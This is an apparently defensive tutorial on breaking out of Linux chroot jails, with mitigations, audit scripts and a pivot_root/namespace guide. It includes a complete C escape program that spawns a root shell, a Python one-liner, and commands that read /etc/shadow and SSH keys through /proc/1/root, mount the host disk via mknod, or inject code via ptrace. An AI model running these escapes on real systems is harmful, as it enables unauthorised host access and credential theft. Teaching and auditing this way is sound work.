Escaping a chroot Jail

For decades people have reached for chroot when they wanted to “lock a process into a directory.” It does change what the process sees as / — and almost nothing else. It doesn’t move your working directory, doesn’t close your open handles, and doesn’t take away root. A privileged process can simply climb back out, and the kernel manual literally tells you how.

There is a sentence in man 2 chroot that should end the “chroot is a sandbox” argument forever: “the superuser can escape from a chroot jail by doing: mkdir foo; chroot foo; cd ..” That is not a hypothetical from a security researcher; it is the documented behaviour of the system call, written by the people who maintain it. chroot() was built in 1979 to give a process a private view of the filesystem for builds and testing. It was never an isolation boundary, and everything below follows from that one design fact. This is a defensive walk-through for people running confined services and CTF/lab learners: understand the escape so you stop trusting the wrong primitive, then confine processes the way that actually holds.

What chroot actually does — and the myth

The chroot(path) system call does exactly one thing: it changes the value the kernel uses as the apparent root for the calling process. From the man page: “chroot() changes the root directory of the calling process to that specified in path. This directory will be used for pathnames beginning with /.” After the call, an absolute path like /etc/passwd is resolved relative to the new root, so the process can no longer name files above it by an absolute path. That is the whole feature.

The myth is that this is the same as confinement. It isn’t, because of three things chroot() deliberately does not do, each one stated plainly in man 2 chroot:

It does not change your current working directory. The manual: “This call does not change the current working directory, so that after the call . can be outside the tree rooted at /.” Read that twice. Your cwd can be outside your own root. That is the entire escape.

It does not close open file descriptors. “This call does not close open file descriptors, and such file descriptors may allow access to files outside the chroot tree.” A handle you opened before the jail still points where it always did.

It does not drop privileges. chroot() requires CAP_SYS_CHROOT to call — and leaves every capability you had intact afterwards, including CAP_SYS_CHROOT itself. So the process can just call chroot() again. Nothing about being “in a jail” weakens the prisoner.
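
The second non-guarantee is the one worth being able to detect. Here is a minimal Python sketch, assuming Linux semantics for `..`: walk upward from the cwd and see whether you ever meet the process's own /. The helper name `cwd_is_under_root` is made up for illustration, and it needs search permission on every ancestor directory.

```python
import os

def cwd_is_under_root(max_depth=256):
    """Return True if walking '..' from the cwd reaches this process's '/'.

    Hypothetical helper: directories are compared by (st_dev, st_ino).
    """
    root = os.stat("/")
    root_key = (root.st_dev, root.st_ino)
    path, prev = ".", None
    for _ in range(max_depth):
        st = os.stat(path)
        key = (st.st_dev, st.st_ino)
        if key == root_key:
            return True        # met our own root: cwd is inside it
        if key == prev:
            return False       # '..' stopped moving somewhere that is not our '/'
        prev = key
        path = os.path.join(path, "..")
    return False               # deeper than max_depth: treat as suspicious

if __name__ == "__main__":
    print("cwd inside root:", cwd_is_under_root())
```

A service wrapper could call something like this right after chroot() and refuse to continue on False. In the state the manual describes, the walk ends at the real filesystem root without ever passing through the new /.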

The three things that make escape possible

An escape isn’t magic and it isn’t a kernel bug. It is the logical consequence of combining the three non-guarantees above. Boil it down and there are exactly three preconditions:

1. You are root inside the jail (or hold CAP_SYS_CHROOT). Calling chroot() a second time — the move that powers the classic break-out — requires that capability. A normal unprivileged user inside the jail cannot call chroot() at all, which is exactly why the answer to confinement is not running services as root.

2. Your working directory or a file descriptor sits above the new root. Because chroot() leaves cwd and open FDs untouched, a process that chroots without first doing chdir("/") is standing on a foothold outside its own cell. . and .. still walk the real tree.

3. There is no second confinement layer. No mount namespace, no seccomp, no dropped capabilities, no pivot_root. chroot is the only thing between the process and the host, so defeating chroot defeats everything.

The classic escape: a saved fd and chdir("..")

This is the canonical break-out, and it is short enough to read in full. The idea: before entering a fresh inner jail, save a handle to a directory that lives above it; then after chroot’ing, jump back to that handle and walk up .. until you hit the real /; finally chroot(".") to make that real root your root again. Here it is as a complete, working C program — every line is a real syscall, nothing is pseudocode:

break_chroot.c — the file-descriptor escape
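#include <fcntl.h>     /* open, O_RDONLY */
#include <sys/stat.h>  /* mkdir */
#include <unistd.h>    /* chroot, chdir, fchdir, close, execl */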

int main(void) {
    int fd;

    mkdir(".out", 0755);     // 1. make a throwaway dir inside the current jail
    fd = open(".", O_RDONLY);  // 2. SAVE an fd to the current dir — this fd outlives chroot
    chroot(".out");          // 3. new root = .out, BUT cwd is NOT moved — cwd is now ABOVE root
    fchdir(fd);              // 4. jump cwd to the saved fd (the old dir, outside the new root)
    close(fd);

    // 5. cwd now sits outside the chroot tree, so ".." keeps climbing the REAL fs
    for (int i = 0; i < 1024; i++)
        chdir("..");          //    walk up until we hit the true root (".." at / is a no-op)

    chroot(".");             // 6. re-root onto the real / — the jail is gone
    return execl("/bin/sh", "sh", "-i", (char *)NULL);  // 7. shell with the whole host filesystem
}

Walk it line by line, because the “trick” is entirely in the ordering. After mkdir(".out") we open "." and keep the descriptor: that handle is bound to the directory object, not to a path, so it survives whatever happens to the namespace next. Then chroot(".out") sets the new root to the subdirectory — but, exactly as the manual promises, our cwd is not moved with it. We are now in the bizarre-but-legal state where cwd is outside /. fchdir(fd) drags the working directory back to that saved spot above the cell, and from there chdir("..") repeated 1024 times climbs to the real filesystem root (once you reach the true /, .. simply points at itself, so over-counting is harmless). The final chroot(".") pins root to where we’re now standing — the genuine host root — and execl drops a shell that can read /etc/shadow and everything else.

Compile and run it from inside a jail as root and you’re out:

build + run inside the jail (as root)
$ gcc -O2 -o break_chroot break_chroot.c
# ./break_chroot
# id; ls /            # real host root, not the jail
uid=0(root) gid=0(root)
bin  boot  dev  etc  home  root  sbin  ...   # escaped

There is an even shorter form for an interactive root shell that already has the tools. Because two chroots cannot nest the way you’d expect, simply chroot’ing into a fresh subdirectory and then walking up escapes — this is the literal man page example expressed as commands:

the man-page one-liner, in python
# python3 -c 'import os; os.mkdir("o"); os.chroot("o"); \
os.chdir("../../../../../../.."); os.chroot("."); os.system("/bin/sh")'
# mkdir o; chroot o  (cwd not moved) ; cd up to real / ; chroot "." ; shell

Other ways out: /proc, device nodes, and ptrace

The fd-walk is the textbook route, but a root process in a weak jail has several doors. They all rely on the same theme: chroot only filters absolute path lookups, so any primitive that reaches the host by another mechanism ignores the cell entirely.

A mounted /proc. This is the most common real-world slip. If procfs is mounted inside the jail, the kernel exposes /proc/<pid>/root, a magic symlink to each process’s root directory. The init process, PID 1, is not chrooted, so its root is the real /. From inside the jail, a root process simply reads through it:

escape through a mounted procfs
# ls -la /proc/1/root/          # PID 1 isn't jailed — this is the host /
# cat /proc/1/root/etc/shadow   # read host files straight through the symlink
# chroot /proc/1/root /bin/sh   # or just re-root onto the host and get a shell

A device node and a raw mount. If the process keeps CAP_MKNOD (and CAP_SYS_ADMIN to mount), chroot does nothing to stop it touching block devices. You can fabricate a device node for the host’s disk with mknod, then mount that filesystem inside the jail and read the host’s files directly — bypassing path-based confinement completely, because you’re going at the bytes underneath:

mknod the host disk, then mount it
# mknod /dev/hax b 8 0          # recreate the host block device (e.g. /dev/sda, major 8 minor 0)
# mkdir /mnt-host
# mount /dev/hax /mnt-host      # mount the host root fs inside the jail
# ls /mnt-host                  # the whole host filesystem is now readable/writable

Ptrace an out-of-jail process. chroot does not create a PID namespace, so a jailed root process can still see — and, with CAP_SYS_PTRACE (or default same-uid rules), attach to — processes running outside the jail. Attach to a non-jailed process, inject shellcode or hijack its execution, and you are running with that process’s unrestricted root view. The jail boundary is a filesystem illusion; it does nothing at the process-table level.

The pattern across all three is the same: a real isolation boundary has to cover the process table, mounts, and capabilities, not just absolute path resolution. chroot covers only the last, and weakly.

When it WON’T work — being honest about prerequisites

None of this means chroot is trivially defeated in every setup. Be precise about the prerequisites, because they are also the defenses:

You need root / CAP_SYS_CHROOT for the classic escape. The fd-walk and the man-page one-liner both depend on a second chroot() call, and chroot() is privileged. An unprivileged process with no capabilities cannot call chroot() at all, so it cannot do the double-chroot trick. If your service runs as a normal user after being jailed, the headline escape is off the table.

The other routes need their own capabilities or mounts. No mounted procfs inside the jail → no /proc/1/root route. No CAP_MKNOD / CAP_SYS_ADMIN → no device-node-and-mount route. No CAP_SYS_PTRACE and no same-uid target outside → no ptrace route. Strip the capabilities and you close the doors one by one.

So the honest summary is: chroot run by root, or by anything holding CAP_SYS_CHROOT, is not a security boundary. chroot used as a view, by a process that has already dropped to a non-root uid with an empty capability set, is much harder to break out of — but at that point chroot is the least of the things protecting you, and you should be using a real sandbox anyway.
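
The prerequisites above map cleanly onto capability bits, so they can be checked mechanically. This is a rough sketch, not a complete audit. The bit numbers come from `<linux/capability.h>`, while the function names and door labels are invented here. The model ignores the same-uid ptrace case and the ptrace-style access check on /proc/<pid>/root.

```python
# Capability bit numbers from <linux/capability.h>.
CAPS = {
    "CAP_SYS_CHROOT": 18,
    "CAP_SYS_PTRACE": 19,
    "CAP_SYS_ADMIN": 21,
    "CAP_MKNOD": 27,
}

def held_caps(capeff_hex):
    """Decode a CapEff hex string into the subset of CAPS that is set."""
    mask = int(capeff_hex, 16)
    return {name for name, bit in CAPS.items() if (mask >> bit) & 1}

def open_doors(capeff_hex, proc_mounted=False):
    """Simplified model: which escape routes from this article stay open."""
    caps = held_caps(capeff_hex)
    doors = []
    if "CAP_SYS_CHROOT" in caps:
        doors.append("double chroot / fd walk")
    if {"CAP_MKNOD", "CAP_SYS_ADMIN"} <= caps:
        doors.append("mknod + mount")
    if "CAP_SYS_PTRACE" in caps:
        doors.append("ptrace")
    if proc_mounted:
        doors.append("/proc/1/root")
    return doors

def own_capeff():
    """Read this process's CapEff from procfs, or '0' if it is unavailable."""
    try:
        with open("/proc/self/status") as fh:
            for line in fh:
                if line.startswith("CapEff:"):
                    return line.split()[1]
    except OSError:
        pass
    return "0"

if __name__ == "__main__":
    print(open_doors(own_capeff()))
```

A confined service that has dropped properly should print an empty list. Anything else names the door to close next.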

The fd escape, at the syscall level

The one-liner everyone copies — chroot() into a subdir, chdir() up a few hundred times, chroot(".") — works for a reason that is worth slowing down on, because the reason is the bug. Two facts about chroot(2) do all the damage. First: it never closes your open file descriptors. A fd you opened before the jail still points at the exact inode it always did, jail or no jail. Second, and this is the one the man page states almost in passing: chroot does not change the calling process's current working directory. So it is entirely possible — in fact it is the normal state right after the call — for your . to be sitting outside the tree rooted at the new /.

That dangling cwd is the whole game. The kernel resolves .. in follow_dotdot(), and the only thing stopping .. from climbing past the root is a check that asks "is the directory I'm standing on equal to this process's root?" If yes, .. is a no-op and you stay put. But if your cwd was never inside the new root to begin with, that equality never becomes true on the way up. You climb, and climb, and the kernel happily lets you, until you hit the real filesystem root and .. finally stops because there is nowhere higher to go. Now . is the true /. One more chroot(".") and the jail is the whole machine.
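
That equality check is easier to see in a toy model. The sketch below is not kernel code: it treats directories as plain host-absolute path strings and reimplements only the "stop if cwd is the root" rule. The names `dotdot` and `climb` are illustrative.

```python
import posixpath

def dotdot(cwd, root):
    """Toy '..' rule: stay put only at the process root or the real '/'."""
    if cwd == root or cwd == "/":
        return cwd
    return posixpath.dirname(cwd)

def climb(cwd, root, steps=1024):
    """Apply '..' repeatedly, the way the chdir("..") loop does."""
    for _ in range(steps):
        cwd = dotdot(cwd, root)
    return cwd

if __name__ == "__main__":
    # cwd inside the root: the walk is stopped at the jail root
    print(climb("/jail/.out/srv/www", root="/jail/.out"))   # prints /jail/.out
    # cwd outside the root: the equality never fires, so we reach the real /
    print(climb("/jail", root="/jail/.out"))                # prints /
```

The second call is the escape in miniature. The walk starts at /jail, which is above the root /jail/.out, so the only thing that stops it is the real top of the tree.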

Here is the canonical proof-of-concept, annotated. This is the classic break-chroot.c shape (Jan Schaumann / countless mirrors) — nothing exotic, and that is the point.

break-chroot.c
/* you are already root INSIDE a chroot; CAP_SYS_CHROOT is required */
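#include <fcntl.h>     /* open, O_RDONLY */
#include <sys/stat.h>  /* mkdir */
#include <unistd.h>    /* chroot, chdir, fchdir, execl */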

int main(void){
    /* 1. make a subdir so we can chroot DEEPER on purpose          */
    mkdir(".out", 0755);

    /* 2. open the CURRENT dir BEFORE we move root. this fd now     */
    /*    pins our position in the OLD tree — chroot won't close it */
    int fd = open(".", O_RDONLY);

    /* 3. chroot one level deeper. KEY: this moves our ROOT but    */
    /*    leaves cwd where it was — so cwd is now OUTSIDE root.     */
    chroot(".out");

    /* 4. land cwd back on the saved fd (outside the new root)     */
    fchdir(fd);

    /* 5. climb. follow_dotdot() never sees cwd == root, so ..     */
    /*    keeps walking up to the REAL filesystem root.            */
    for (int i = 0; i < 1024; i++) chdir("..");

    /* 6. cwd is now the true /. re-root onto it. jail gone.       */
    chroot(".");

    execl("/bin/sh", "sh", "-i", (char *)0);
    return 0;
}

Why 1024 and not a precise count? Because chdir("..") at the real root is just a no-op — climbing "too far" costs nothing, so you over-climb to be safe instead of computing your depth. Note also the asymmetry the PoC leans on: in step 3 the deeper chroot moves root but not cwd, and in step 6 we don't even need the fd anymore — by then plain chdir("..") has already walked us out. The fd in step 2 only matters if some wrapper chdir'd you into the jail first; fchdir simply restores the useful out-of-jail cwd. Strip the cwd-outside-root condition and the entire technique dies — which, as we'll see, is exactly what pivot_root does and chroot refuses to.

When the jail has too much: device and mount escapes

The fd trick needs nothing but a careless caller. The next class of escapes needs something stronger — capabilities the jail should never have handed you — but when they're present, you don't sneak out of the jail, you reach around it and read the host's disk directly. Root inside a chroot is still root; the chroot only narrows the pathname view, not what root is allowed to do with raw devices.

mknod a disk, then mount it

If you hold CAP_MKNOD, you can manufacture a device node for the host's root disk even though /dev inside the jail is empty. Create the block device with the right major:minor, then — if you also have CAP_SYS_ADMIN — mount it somewhere inside the jail and walk the host's real filesystem.

mknod + mount the host disk
# find the host's root block device (e.g. 8,2 for /dev/sda2)
# cat /proc/partitions          # readable even in many jails

# forge the block device inside the jail  (needs CAP_MKNOD)
# mknod /hostdisk b 8 2

# mount it — now the host root fs is visible at /mnt (needs CAP_SYS_ADMIN)
# mkdir /mnt && mount /hostdisk /mnt
# cat /mnt/etc/shadow            # host's real shadow, outside the jail

/dev/mem and the host's process roots

A jail that ships a populated /dev or a mounted /proc leaks even more. If /dev/mem exists in the jail and you have access to it, you can read (and on misconfigured systems write) physical RAM directly; root's view of memory ignores the pathname jail entirely. And if /proc is mounted, every host process advertises its real root at /proc/<pid>/root. PID 1 lives outside any jail, so its root is the host root:

/proc and /dev/mem leaks
# if /proc is mounted in the jail: init's root is the HOST root
# ls -la /proc/1/root/           # the whole host filesystem
# cat /proc/1/root/etc/shadow

# a bind mount can also drag the outside world in (needs CAP_SYS_ADMIN)
# mkdir /esc && mount --bind / /esc   # "/" here is still the jail root,
                                     # but bind-mounting host paths from
                                     # a parent ns is the real-world variant

# raw physical memory, if the node is present and readable
# ls -l /dev/mem                 # major 1, minor 1 — read host RAM

Why these work: The chroot rewrites how pathnames are resolved. It does not revoke root's capabilities, and it does not stop the kernel from honouring a block-device node or a /proc/<pid>/root symlink. A jail that grants CAP_MKNOD + CAP_SYS_ADMIN, ships device nodes, or mounts /proc, has handed you the keys without ever opening the cell.
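
The flip side is an easy host-side check: a jail tree should normally contain few or no device nodes, and certainly no block devices. Here is a small sketch that lists whatever is there. The helper name is hypothetical and `/var/jail` is an assumed example path.

```python
import os
import stat

def find_device_nodes(jail):
    """Return (path, kind, major, minor) for each device node under jail."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(jail):   # symlinks are not followed
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                                  # vanished or unreadable
            if stat.S_ISBLK(st.st_mode):
                kind = "b"
            elif stat.S_ISCHR(st.st_mode):
                kind = "c"
            else:
                continue
            found.append((path, kind, os.major(st.st_rdev), os.minor(st.st_rdev)))
    return found

if __name__ == "__main__":
    for path, kind, major, minor in find_device_nodes("/var/jail"):
        print(f"{kind} {major}:{minor} {path}")
```

Any "b" entry deserves a hard look, and a character device with major 1, minor 1 is /dev/mem under another name.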

ptrace: hijack a process that's already free

Every escape so far walks your process out. ptrace flips it: leave your process where it is, and seize control of a different process that was never jailed. If a process running outside the chroot shares your view enough to be attached — and you hold CAP_SYS_PTRACE (or it's your own uid and Yama's ptrace_scope allows it) — you can attach, rewrite its registers and memory, and make it execute your code. Its root is the host root, so the code you inject runs free.

attach an out-of-jail process
# the gate: 0 = attach any process you own, 1 = only descendants
# cat /proc/sys/kernel/yama/ptrace_scope

# attach to a victim PID that lives OUTSIDE the jail (CAP_SYS_PTRACE)
# gdb -p <pid>
(gdb) # PTRACE_POKETEXT shellcode into its address space, set $pc, continue
(gdb) call (int) execl("/bin/sh", "/bin/sh", 0)

# equivalently, a PTRACE_ATTACH / POKETEXT / SETREGS / DETACH PoC in C:
#   ptrace(PTRACE_ATTACH, pid, 0, 0);  waitpid(pid,...);
#   ptrace(PTRACE_GETREGS, ...);  write shellcode w/ PTRACE_POKETEXT;
#   ptrace(PTRACE_SETREGS, ...);  ptrace(PTRACE_DETACH, pid, 0, 0);

The honest prerequisites matter here. Many distributions ship kernel.yama.ptrace_scope=1, which forbids attaching to non-descendants unless you have CAP_SYS_PTRACE, so in a jail that has properly dropped its capabilities this door is shut. It only opens when the jail kept the ptrace capability or the host left ptrace_scope=0, and when there actually is a juicy un-jailed process to grab.
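
Checking that gate is a one-file read. A small sketch, assuming the standard Yama sysctl path. The level descriptions are paraphrased from the Yama documentation, and the function names are illustrative.

```python
PTRACE_SCOPE = {
    0: "classic: any same-uid process can be attached",
    1: "restricted: only descendants, unless the tracer has CAP_SYS_PTRACE",
    2: "admin-only: attaching requires CAP_SYS_PTRACE",
    3: "disabled: no process may attach",
}

def read_ptrace_scope(path="/proc/sys/kernel/yama/ptrace_scope"):
    """Return the Yama level as an int, or None if it cannot be read."""
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None

def describe(level):
    """Human-readable meaning of a ptrace_scope level."""
    if level is None:
        return "Yama not available: only the classic uid/capability checks apply"
    return PTRACE_SCOPE.get(level, "unknown level")

if __name__ == "__main__":
    print(describe(read_ptrace_scope()))
```

Levels 1 and above only help against a jailed process that no longer holds CAP_SYS_PTRACE, which is one more reason to drop capabilities rather than rely on the sysctl.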

The real fix: pivot_root and mount namespaces

The reason chroot is escapable isn't a bug to be patched — it's the design. chroot moves one process's idea of / and touches nothing else: not your cwd, not your open fds, not anyone else's view, not the mount table. Containers don't "harden chroot"; they replace it with primitives that close every gap chroot leaves open. The headline swap is pivot_root inside a fresh mount namespace.

unshare(CLONE_NEWNS) gives the process a private copy of the mount table — changes here don't leak out, and (with private propagation) the host's mounts can be detached without affecting it. Then pivot_root(new_root, put_old) does what chroot won't: it swaps the root mount of the whole namespace, and crucially it rewrites the root and cwd of every process in that namespace that was pointing at the old root — so there's no leftover cwd hanging outside to climb back through. After the swap you unmount the old root entirely, and the path to the host is not merely forbidden, it's gone from the mount table.

the correct pivot_root sequence
# 1. private mount namespace so nothing propagates either way
# unshare --mount --propagation private bash

# 2. new_root MUST be a mount point — bind it onto itself
# mount --bind /srv/newroot /srv/newroot

# 3. a place to stash the old root, UNDER the new root
# mkdir -p /srv/newroot/old_root

# 4. swap: new_root becomes /, old root is parked at /old_root
# cd /srv/newroot
# pivot_root . old_root

# 5. fix up cwd + std mounts, then DETACH the old root for good
# cd /
# mount -t proc proc /proc
# umount -l /old_root            # MNT_DETACH — host fs no longer reachable

The equivalent in C is the sequence containers actually run: mount(NULL,"/",NULL,MS_REC|MS_PRIVATE,NULL), bind new_root onto itself, chdir(new_root), pivot_root(".",".") (the self-stacking variant), then umount2(".",MNT_DETACH). pivot_root demands CAP_SYS_ADMIN and refuses if the parent mounts are MS_SHARED — precisely so the swap can never propagate into another namespace. That, plus dropped capabilities, seccomp, and user namespaces, is why you can hand a container root and still keep it boxed: there is no cwd left outside, no fd to the host, and no mount to climb.

| Gap chroot leaves | What chroot does | pivot_root + namespaces |
| --- | --- | --- |
| cwd outside root | cwd untouched; can sit outside | cwd rewritten to new root |
| open fds | kept open across the call | old root unmounted; fds to it become dead ends |
| mount table | shared with host | private namespace; host mounts detached |
| raw devices | root keeps CAP_MKNOD etc. | caps dropped + devices not present |

A full escape, start to finish

To make it concrete, here's how the pieces chain in a typical CTF / HTB-style "you have a shell in a chroot" box. Each step is just enumeration deciding which door is actually open.

enumerate → pick a door → escape
# 1. confirm you're jailed and learn who you are
$ ls -la /                       # suspiciously tiny root?
$ id ; cat /proc/self/status | grep Cap   # CapEff = which doors are open

# 2. are we root in the jail? decode the cap bitmap
$ capsh --decode=<CapEff-hex>     # look for sys_chroot, mknod, sys_admin, sys_ptrace

# 3a. only CAP_SYS_CHROOT → classic fd escape
$ gcc -o /tmp/x break-chroot.c && /tmp/x      # shell at the real /

# 3b. CAP_MKNOD + CAP_SYS_ADMIN → mount the host disk
# grep -w / /proc/1/mountinfo     # find host root major:minor
# mknod /hd b 8 2 ; mount /hd /mnt ; chroot /mnt sh

# 3c. /proc mounted → read through init's root (needs root: /proc/<pid>/root sits behind a ptrace-style access check)
# cat /proc/1/root/root/.ssh/id_rsa   # loot, or chroot into it

# 4. land on the host, grab the flag / persist
# cat /root/root.txt

Doing confinement properly

If you genuinely need a directory view and you’re going to use chroot, at least use it the way that doesn’t hand attackers the escape — and understand it is only one thin layer.

Use chroot correctly (the minimum): Always chdir() into the new root before you run anything, so cwd is never left above it. Then drop privileges: setgroups(), setgid(), then setuid() to a non-root account, and drop the capability set, critically CAP_SYS_CHROOT, CAP_MKNOD, CAP_SYS_ADMIN and CAP_SYS_PTRACE. The order matters: chroot() first (it needs the cap), chdir("/") into it, then drop. Don’t mount procfs inside the jail. With no capabilities and a non-root uid, the classic break-outs simply can’t be issued.

the safe sequence (C, simplified)
chroot("/var/jail");    // needs CAP_SYS_CHROOT — do it first
chdir("/");             // NOW cwd is inside the new root — no foothold left
setgroups(0, NULL);
setgid(65534);          // drop gid to "nobody"
setuid(65534);          // drop uid LAST — after this you can't chroot again
// now exec the confined program — it has no CAP_SYS_CHROOT to break out
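
The same ordering can be written so that it checks itself. This is a hedged Python sketch, not a hardened launcher. The name `enter_jail` and the injectable `ops` parameter are inventions for illustration (the parameter exists only so the ordering can be exercised without root), and 65534 is the conventional "nobody" id assumed above.

```python
import os

def enter_jail(jail, uid=65534, gid=65534, ops=os):
    """chroot, close the cwd foothold, drop to uid/gid, then prove the drop stuck."""
    ops.chroot(jail)       # needs CAP_SYS_CHROOT, so it goes first
    ops.chdir("/")         # cwd is now inside the new root
    ops.setgroups([])      # clear supplementary groups while still privileged
    ops.setgid(gid)        # gid before uid: setgid needs privilege too
    ops.setuid(uid)        # for a non-root uid this cannot be undone
    try:
        ops.setuid(0)      # must fail if the drop really happened
    except PermissionError:
        return
    raise RuntimeError("privilege drop was reversible; refusing to continue")

# Usage (as root), before exec'ing the confined program:
#     enter_jail("/var/jail")
#     os.execv("/bin/service", ["service"])   # hypothetical binary inside the jail
```

The final setuid(0) probe is the useful part: if it succeeds, the process kept a way back to root, and with it a way back to chroot(). This sketch does not close inherited file descriptors, so anything opened before the call still needs closing.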

But for real isolation, don’t lean on chroot at all — reach for the primitives the kernel actually designed for it:

Mount namespaces + pivot_root. This is what containers use. pivot_root swaps the entire root mount in a private mount namespace and then unmounts the old root, so there is no parent tree left to cd .. into — the foothold that powers the chroot escape is physically removed. unshare --mount --pid --net ... gives you that namespace boundary from the shell.

Namespaces for everything else. A PID namespace means the jailed process can’t even see host processes, killing the ptrace route. A user namespace lets you have “root” inside that maps to an unprivileged uid outside. A network namespace cuts it off the wire.

seccomp-bpf. Filter the syscalls the process is allowed to make at all — block chroot, mount, mknod, ptrace outright and the escapes have no syscall to call.

Or just use the finished tools. bwrap (bubblewrap), nsjail, firejail, systemd’s RootDirectory= + PrivateUsers= + NoNewPrivileges=, or a real container runtime stack all of these layers for you. That is the difference between a view and a sandbox.
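
As one illustration of "the finished tools", here is a sketch that only builds a bubblewrap command line; it does not run anything. The flag selection is an assumption about a reasonable minimum, `/srv/newroot` is the example path from the pivot_root section, and the helper name is made up.

```python
import shlex

def bwrap_argv(new_root, command):
    """Build (but do not execute) a bubblewrap invocation for a read-only root."""
    return [
        "bwrap",
        "--unshare-all",             # fresh namespaces instead of a bare chroot
        "--ro-bind", new_root, "/",  # new_root becomes a read-only /
        "--dev", "/dev",             # minimal /dev, no host block devices
        "--die-with-parent",         # kill the sandbox if the launcher dies
        "--new-session",             # detach from the controlling terminal
        *command,
    ]

if __name__ == "__main__":
    print(shlex.join(bwrap_argv("/srv/newroot", ["/bin/sh"])))
```

The host's /proc and devices are absent because nothing binds them in, which is the opposite default from a chroot that inherits whatever the admin forgot to remove.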

Escape routes at a glance

| Escape route | Requirement | Defense |
| --- | --- | --- |
| fd + chdir("..") | root / CAP_SYS_CHROOT; cwd or fd above root | chdir("/") then drop uid + CAP_SYS_CHROOT |
| Double chroot | root / CAP_SYS_CHROOT (2nd chroot call) | Drop CAP_SYS_CHROOT after entering |
| /proc/1/root | procfs mounted in jail | Don’t mount /proc; use PID namespace |
| mknod + mount | CAP_MKNOD + CAP_SYS_ADMIN | Drop both caps; mount namespace |
| ptrace | CAP_SYS_PTRACE / same-uid target outside | PID namespace; drop ptrace cap |
| (any of the above) | chroot is the only layer | pivot_root + namespaces + seccomp |

The essence: chroot() changes a process’s apparent / and nothing else. It doesn’t move your cwd, doesn’t close open file descriptors, and doesn’t drop privileges. So a root (or CAP_SYS_CHROOT) process saves an fd above the jail, chroots into a subdir, fchdirs back out, walks .. to the real root and re-chroots onto it; the escape is literally in man 2 chroot. A mounted /proc/1/root, an mknod’d disk, or ptrace of an out-of-jail process get out just as easily. An unprivileged process with no caps can’t do the classic trick, which is the whole point: never run jailed services as root. For real confinement, chdir in and drop uid + capabilities, or better, use mount/PID/user namespaces, pivot_root and seccomp (bubblewrap, nsjail, containers). chroot is a view, not a sandbox.